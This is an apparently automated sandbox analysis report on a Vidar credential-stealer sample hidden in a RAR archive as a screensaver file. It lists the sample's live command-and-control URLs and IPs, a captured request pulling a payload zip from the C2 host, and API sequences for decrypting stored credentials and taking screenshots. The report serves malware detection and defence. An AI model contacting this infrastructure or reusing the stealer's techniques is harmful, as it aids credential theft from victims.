Windows Analysis Report
pdf_novichki.rar

Overview

General Information

Sample Name:pdf_novichki.rar
Analysis ID:829691
MD5:214c47a7948ca5d3834c3f21cd1cc208
SHA1:865f07f62dcf68c9929baf4890328e32d7f923fa
SHA256:0a5e037e5954adb680c726089439539073993e2e1114a9ca9e6932e7dd702d9e

Detection

Vidar
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Antivirus detection for dropped file
Drops PE files with a suspicious file extension
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Contains functionality to compare user and computer (likely to detect sandboxes)
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 1708 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)
  • OpenWith.exe (PID: 6360 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: 5D37A62943F1071FFFFE1DE74B8F2778)
  • 7zG.exe (PID: 6632 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\pdf_novichki\" -spe -an -ai#7zMap2692:86:7zEvent4577 MD5: 04FB3AE7F05C8BC333125972BA907398)
  • pdf4ik.scr (PID: 6916 cmdline: "C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr" /S MD5: BF481108AC0A54E82E5683ED8AE58CEB)
    • WerFault.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968 MD5: 28D356B668C66115EA55135D24EEFB2C)
  • cleanup
{"Botnet": "3", "C2 url": ["https://t.me/zaskullz", "https://steamcommunity.com/profiles/76561199486572327"]}
Source | Rule | Description | Author | Strings
0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: pdf4ik.scr PID: 6916 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: pdf4ik.scr PID: 6916 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
12.2.pdf4ik.scr.29d80000.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
12.2.pdf4ik.scr.29d80000.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
12.2.pdf4ik.scr.29adb058.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
12.0.pdf4ik.scr.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen | 0x75042a:$s1: JohnDoe; 0x750432:$s2: HAL9TH
                  No Sigma rule has matched
                  No Snort rule has matched

                  AV Detection

                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAvira: detection malicious, Label: WORM/Lodbak.Gen2
                  Source: 12.2.pdf4ik.scr.29d80000.1.unpackMalware Configuration Extractor: Vidar {"Botnet": "3", "C2 url": ["https://t.me/zaskullz", "https://steamcommunity.com/profiles/76561199486572327"]}
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D94697 lstrcatA,lstrcatA,lstrcatA,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,_memset,lstrcatA,lstrcatA,lstrcatA,KiUserExceptionDispatcher,CryptBinaryToStringA,GetProcessHeap,HeapAlloc,_memset,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,CreateThread,Sleep,12_2_29D94697
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D98FB0 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,12_2_29D98FB0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D991B0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,12_2_29D991B0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D85010 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,12_2_29D85010
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D99210 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,12_2_29D99210
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D994A0 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,12_2_29D994A0
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49732 version: TLS 1.2
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9B960 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,12_2_29D9B960
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D93B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D93B60
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA4C40 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_29DA4C40
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9CE80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,12_2_29D9CE80
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D96160 _memset,_memset,SHGetFolderPathA,lstrcatA,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D96160
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90130 wsprintfA,FindFirstFileA,_memset,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,12_2_29D90130
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9E060 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,12_2_29D9E060
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D8F3E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcatA,_malloc,GetTickCount,_rand,wsprintfA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlenA,12_2_29D8F3E0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9B520 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,12_2_29D9B520
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D964B0 _memset,SHGetFolderPathA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,SHGetFolderPathA,wsprintfA,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,12_2_29D964B0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D9E470 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,12_2_29D9E470
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA,12_2_29D90880

                  Networking

                  Source: Malware configuration extractorURLs: https://t.me/zaskullz
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199486572327
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Joe Sandbox ViewIP Address: 116.203.13.130 116.203.13.130
                  Source: global traffic | HTTP traffic detected: GET /zaskullz HTTP/1.1 | X-Id: 14ac9d852bc10b98f94de36f839b2f59 | User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 | Host: t.me
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | X-Id: 14ac9d852bc10b98f94de36f839b2f59 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37 | Host: 116.203.13.130
                  Source: global traffic | HTTP traffic detected: GET /edit.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37 | Host: 116.203.13.130 | Cache-Control: no-cache
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 18 Mar 2023 20:39:15 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytes
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.224.151.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.88.191
                  Source: unknownTCP traffic detected without corresponding DNS query: 116.203.13.130
                  Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.0000000001616000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zip
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zip9
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zip:D
                  Source: pdf4ik.scr, 0000000C.00000002.2415135723.0000000001453000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zipcac5b60b5e28992247664-7ff3f708-074b-4ff4-b2c5-87e7-806e6f6e6963
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zipvqD
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/edit.zipx
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130/oI
                  Source: pdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.203.13.130z
                  Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://135.181.87.234:80
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001613000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.0000000001621000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: pdf4ik.scr, 0000000C.00000003.2359804569.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: 7zG.exe, 00000009.00000003.2210724131.00000293F0BF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199486572327
                  Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199486572327http://135.181.87.234:80update.zip;open_open
                  Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/:
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/X
                  Source: pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/zaskullz
                  Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/zaskullzfunkstaredit.zipMozilla/5.0
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                  Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/88.0.1/releasenotes
                  Source: unknownDNS traffic detected: queries for: t.me
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D91560 DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_29D91560
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA50A0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,12_2_29DA50A0

                  System Summary

                  Source: 12.0.pdf4ik.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                  Source: 12.0.pdf4ik.scr.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: String function: 29D84750 appears 118 times
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: String function: 29DB5A50 appears 44 times
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: String function: 29D89100 appears 66 times
                  Source: C:\Program Files\7-Zip\7zG.exeProcess Stats: CPU usage > 98%
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 74C60000 page read and write
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 74C69000 page read and write
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 75D70000 page read and write
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 75D71000 page read and write
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Memory allocated: 74510000 page read and write
                  Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                  Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\pdf_novichki\" -spe -an -ai#7zMap2692:86:7zEvent4577
                  Source: unknownProcess created: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr "C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr" /S
                  Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                  Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback
                  Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C94.tmp
                  Source: classification engineClassification label: mal80.troj.spyw.evad.winRAR@4/8@1/5
